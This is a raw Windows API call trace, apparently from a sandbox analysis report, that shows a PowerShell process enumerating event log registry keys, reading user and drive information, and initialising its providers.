	[0532.716] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d02c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d028, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d02c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d028*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.716] CoTaskMemFree (pv=0x0) 
	[0532.716] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.716] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.716] CoTaskMemFree (pv=0x34c760) 
	[0532.716] CoTaskMemFree (pv=0x0) 
	[0532.717] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.717] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.717] CoTaskMemFree (pv=0x34c760) 
	[0532.717] CoTaskMemFree (pv=0x0) 
	[0532.717] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.717] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.717] CoTaskMemFree (pv=0x34c760) 
	[0532.717] CoTaskMemFree (pv=0x0) 
	[0532.717] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.717] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.717] CoTaskMemFree (pv=0x34c760) 
	[0532.717] CoTaskMemFree (pv=0x0) 
	[0532.717] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.717] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.718] CoTaskMemFree (pv=0x34c760) 
	[0532.718] CoTaskMemFree (pv=0x0) 
	[0532.718] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.718] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.718] CoTaskMemFree (pv=0x34c760) 
	[0532.718] CoTaskMemFree (pv=0x0) 
	[0532.718] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.718] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.718] CoTaskMemFree (pv=0x34c760) 
	[0532.718] CoTaskMemFree (pv=0x0) 
	[0532.718] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.718] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.718] CoTaskMemFree (pv=0x34c760) 
	[0532.718] CoTaskMemFree (pv=0x0) 
	[0532.718] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0532.718] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x34c760, lpcchName=0x12d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0532.719] CoTaskMemFree (pv=0x34c760) 
	[0532.719] CoTaskMemFree (pv=0x0) 
	[0532.719] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x368) returned 0x0
	[0532.719] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.719] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x38c) returned 0x0
	[0532.719] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.719] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x390) returned 0x0
	[0532.719] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.719] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x394) returned 0x0
	[0532.719] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x398) returned 0x0
	[0532.720] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x39c) returned 0x0
	[0532.720] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x3a0) returned 0x0
	[0532.720] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x3a4) returned 0x0
	[0532.720] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x0) returned 0x2
	[0532.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x3a8) returned 0x0
	[0532.721] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d118 | out: phkResult=0x12d118*=0x3ac) returned 0x0
	[0532.721] RegCloseKey (hKey=0x3ac) returned 0x0
	[0532.721] RegCloseKey (hKey=0x388) returned 0x0
	[0532.721] RegCloseKey (hKey=0x3a8) returned 0x0
	[0532.726] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8f0008
	[0533.558] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dfbc30*="WSMan", lpRawData=0x2dfb9a0) returned 1
	[0533.560] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.560] CoTaskMemFree (pv=0x3ba790) 
	[0533.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.562] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0533.562] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0533.562] CoTaskMemFree (pv=0x1b7dd910) 
	[0533.562] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0533.562] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0533.563] CoTaskMemFree (pv=0x34c760) 
	[0533.563] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e01168*="Alias", lpRawData=0x2e00ef8) returned 1
	[0533.564] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.565] CoTaskMemFree (pv=0x3ba790) 
	[0533.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.567] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0533.567] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0533.567] CoTaskMemFree (pv=0x1b7dd910) 
	[0533.567] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0533.567] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0533.567] CoTaskMemFree (pv=0x34c760) 
	[0533.568] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e06760*="Environment", lpRawData=0x2e064f0) returned 1
	[0533.569] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.569] CoTaskMemFree (pv=0x3ba790) 
	[0533.570] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.570] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0533.570] CoTaskMemFree (pv=0x3ba790) 
	[0533.570] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.570] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0533.571] CoTaskMemFree (pv=0x3ba790) 
	[0533.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0533.571] SetErrorMode (uMode=0x1) returned 0x1
	[0533.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d160 | out: lpFileInformation=0x12d160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0533.571] SetErrorMode (uMode=0x1) returned 0x1
	[0533.572] GetLogicalDrives () returned 0x4
	[0533.573] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0533.574] SetErrorMode (uMode=0x1) returned 0x1
	[0533.575] CoTaskMemAlloc (cb=0x68) returned 0x3b45f0
	[0533.575] CoTaskMemAlloc (cb=0x68) returned 0x3b4580
	[0533.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3b45f0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d130, lpMaximumComponentLength=0x12d12c, lpFileSystemFlags=0x12d128, lpFileSystemNameBuffer=0x3b4580, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d130*=0x9c354b42, lpMaximumComponentLength=0x12d12c*=0xff, lpFileSystemFlags=0x12d128*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0533.575] CoTaskMemFree (pv=0x3b45f0) 
	[0533.575] CoTaskMemFree (pv=0x3b4580) 
	[0533.575] SetErrorMode (uMode=0x1) returned 0x1
	[0533.576] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0533.577] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.577] SetErrorMode (uMode=0x1) returned 0x1
	[0533.577] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0533.577] SetErrorMode (uMode=0x1) returned 0x1
	[0533.577] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.577] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.577] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0533.578] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0533.579] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.579] SetErrorMode (uMode=0x1) returned 0x1
	[0533.579] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cf00 | out: lpFileInformation=0x12cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0533.579] SetErrorMode (uMode=0x1) returned 0x1
	[0533.579] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.579] SetErrorMode (uMode=0x1) returned 0x1
	[0533.579] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cf00 | out: lpFileInformation=0x12cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0533.579] SetErrorMode (uMode=0x1) returned 0x1
	[0533.579] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0533.580] SetErrorMode (uMode=0x1) returned 0x1
	[0533.580] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0533.580] SetErrorMode (uMode=0x1) returned 0x1
	[0533.580] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0533.580] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0533.580] CoTaskMemFree (pv=0x1b7dd910) 
	[0533.581] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0533.581] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0533.581] CoTaskMemFree (pv=0x34c760) 
	[0533.581] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e0d850*="FileSystem", lpRawData=0x2e0d5e0) returned 1
	[0533.583] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.583] CoTaskMemFree (pv=0x3ba790) 
	[0533.587] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0533.587] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0533.587] CoTaskMemFree (pv=0x1b7dd910) 
	[0533.587] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0533.587] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0533.587] CoTaskMemFree (pv=0x34c760) 
	[0533.588] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e13090*="Function", lpRawData=0x2e12e20) returned 1
	[0533.588] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0533.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.588] CoTaskMemFree (pv=0x3ba790) 
	[0534.440] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0534.440] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0534.441] CoTaskMemFree (pv=0x1b7dd910) 
	[0534.441] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0534.441] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0534.441] CoTaskMemFree (pv=0x34c760) 
	[0534.441] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e358b8*="Registry", lpRawData=0x2e35648) returned 1
	[0535.235] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0535.235] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0535.235] CoTaskMemFree (pv=0x1b7dd910) 
	[0535.235] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0535.235] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0535.235] CoTaskMemFree (pv=0x34c760) 
	[0535.235] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e3acd0*="Variable", lpRawData=0x2e3aa60) returned 1
	[0535.238] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0535.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.238] CoTaskMemFree (pv=0x3ba790) 
	[0535.238] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0535.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.238] CoTaskMemFree (pv=0x3ba790) 
	[0535.256] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0535.256] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0535.256] CoTaskMemFree (pv=0x1b7dd910) 
	[0535.256] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0535.256] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0535.256] CoTaskMemFree (pv=0x34c760) 
	[0535.256] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e4e8e8*="Certificate", lpRawData=0x2e4e678) returned 1
	[0535.257] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0535.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.258] CoTaskMemFree (pv=0x3ba790) 
	[0535.258] CoTaskMemAlloc (cb=0x20e) returned 0x3a7110
	[0535.258] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a7110 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0535.259] CoTaskMemFree (pv=0x3a7110) 
	[0535.259] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0535.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.259] CoTaskMemFree (pv=0x3ba790) 
	[0535.259] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0535.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.259] CoTaskMemFree (pv=0x3ba790) 
	[0536.288] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0536.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.288] CoTaskMemFree (pv=0x3ba790) 
	[0536.291] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0536.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
